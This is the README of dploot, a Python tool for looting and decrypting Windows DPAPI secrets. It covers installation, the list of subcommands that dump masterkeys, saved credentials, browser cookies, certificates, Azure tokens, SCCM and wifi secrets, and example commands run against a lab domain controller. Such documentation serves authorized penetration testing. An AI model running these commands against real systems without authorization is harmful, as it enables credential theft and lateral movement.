
Loot and decrypt Windows DPAPI secrets remotely or offline, including masterkeys, credentials, vaults, certificates, browser data, and cached Azure tokens.
dploot is Python rewrite of SharpDPAPI written in C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.
If you don't know what is DPAPI, check out this post.
You can install dploot directly from PyPI with pipx:
pipx install git+https://github.com/zblurx/dploot.git
OR
pipx install dploot
On Kali Linux, you can install dploot from the repositories:
sudo apt install python3-dploot
dploot (https://github.com/zblurx/dploot) v4.0.0 by @_zblurx
usage: dploot [-h]
{backupkey,blob,browser,certificates,cng,credentials,machinecertificates,machinecng,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
...
DPAPI looting in Python
positional arguments:
{backupkey,blob,browser,certificates,cng,credentials,machinecertificates,machinecng,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
Action
backupkey Backup Keys from domain controller
blob Decrypt DPAPI blob. Can fetch masterkeys on target
browser Dump users credentials and cookies saved in browser from local or remote target
certificates Dump users certificates from local or remote target
cng Dump users CNG files blob from local or remote target
credentials Dump users Credential Manager blob from local or remote target
machinecertificates
Dump system certificates from local or remote target
machinecng Dump system CNG files from local or remote target
machinecredentials Dump system credentials from local or remote target
machinemasterkeys Dump system masterkey from local or remote target
machinetriage Loot SYSTEM Masterkeys (if not set), SYSTEM credentials, SYSTEM certificates and SYSTEM vaults from local or remote target
machinevaults Dump system vaults from local or remote target
masterkeys Dump users masterkey from local or remote target
mobaxterm Dump Passwords and Credentials from MobaXterm
rdg Dump users saved password information for RDCMan.settings from local or remote target
sccm Dump SCCM secrets (NAA, Collection variables, tasks sequences credentials) from local or remote target
triage Loot Masterkeys (if not set), credentials, rdg, certificates, browser and vaults from local or remote target
vaults Dump users Vaults blob from local or remote target
wam Dump users cached azure tokens from local or remote target
wifi Dump wifi profiles from local or remote target
options:
-h, --help show this help message and exit
dploot v4.0.0+ supports multiple network protocols for remote access. You select the protocol using --protocol <protocol_name>. Each protocol has different capabilities and requirements:
Example using WMI protocol:
$ dploot masterkeys --protocol wmi -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5
Example using local protocol (offline filesystem):
$ dploot masterkeys --protocol local --root /mnt/c_drive -u bob -p Password
Important notes on command support:
backupkey only works with SMB protocol (requires domain controller access).--dpapi-system-key.dploot can authenticate with Kerberos for the smb, wmi, and mssql protocols. Use -k to enable Kerberos with NTLM fallback. If you want to use a cached ticket, use --use-kcache. To use an AES key, use --aesKey.
$ dploot masterkeys -d waza.local -u Administrator -k -t 192.168.57.5
The goal of dploot is to simplify DPAPI related loot from a Linux box. How you use this tool depends on your access level and target configuration.
The default protocol is SMB. This is the most common approach for DPAPI looting and works with standard Windows file sharing:
$ dploot masterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)
[*] Triage ALL USERS masterkeys
{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba
WMI provides an alternative to SMB for remote access and is useful when SMB is restricted: